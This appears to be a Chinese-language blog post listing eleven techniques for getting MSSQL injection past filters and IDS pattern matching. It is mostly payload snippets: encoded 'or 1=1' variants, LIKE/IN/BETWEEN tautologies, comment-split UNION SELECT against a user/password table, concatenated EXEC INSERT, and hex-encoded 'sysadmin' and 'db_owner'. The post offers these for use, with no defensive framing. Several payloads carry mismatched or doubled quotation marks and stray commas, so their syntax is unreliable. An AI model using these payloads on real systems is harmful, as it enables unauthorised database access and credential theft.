1、運用編碼技術繞過

如URLEncode編碼,ASCII編碼繞過。

例如or 1=1即

%6f%72%20%31%3d%31

而Test也可以為

CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

2.通過空格繞過如兩個空格代替一個空格,用Tab代替空格等,或者刪除所有空格,如

or'' swords'' =‘swords''

由於mssql的鬆散性,我們可以把or ”swords” 之間的空格去掉,並不影響運行。

3、運用字串判斷代替用經典的or 1=1判斷繞過,如

or ''swords'' =''swords''

這個方法就是網上在討論的。

4、通過類型轉換修飾符N繞過

可以說這是一個不錯的想法,他除了能在某種程度上繞過限制,而且還有別的作用,大家自己好好想想吧。關於利用,如

or ''swords'' = N'' swords''

大寫的N告訴mssql server 字串作為nvarchar類型,它起到類型轉換的作用,並不影響注射語句本身,但是可以避過基於知識的模式匹配IDS。

5、通過+號拆解字串繞過效果值得考證,但畢竟是一種方法。如

or ''swords'' =‘sw'' +'' ords'' ;EXEC(‘IN'' +'' SERT INTO ''+'' …..'' )

6、通過LIKE繞過

以前怎麼就沒想到呢?如

or''swords'' LIKE ''sw''

顯然可以很輕鬆的繞過“=”“>”的限制……

7、通過IN繞過與上面的LIKE的思路差不多,如

or ''swords'' IN (''swords'')

8、通過BETWEEN繞過如

or ''swords'' BETWEEN ''rw'' AND ''tw''

9、通過>或者<繞過

or ''swords'' > ''sw''
or ''swords'' < ''tw''
or 1<3

10、運用注釋語句繞過用/**/代替空格,如:

UNION /**/ Select /**/user,pwd,from tbluser

用/**/分割敏感詞,如:

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

11、用HEX繞過,一般的IDS都無法檢測出來

0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

 

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料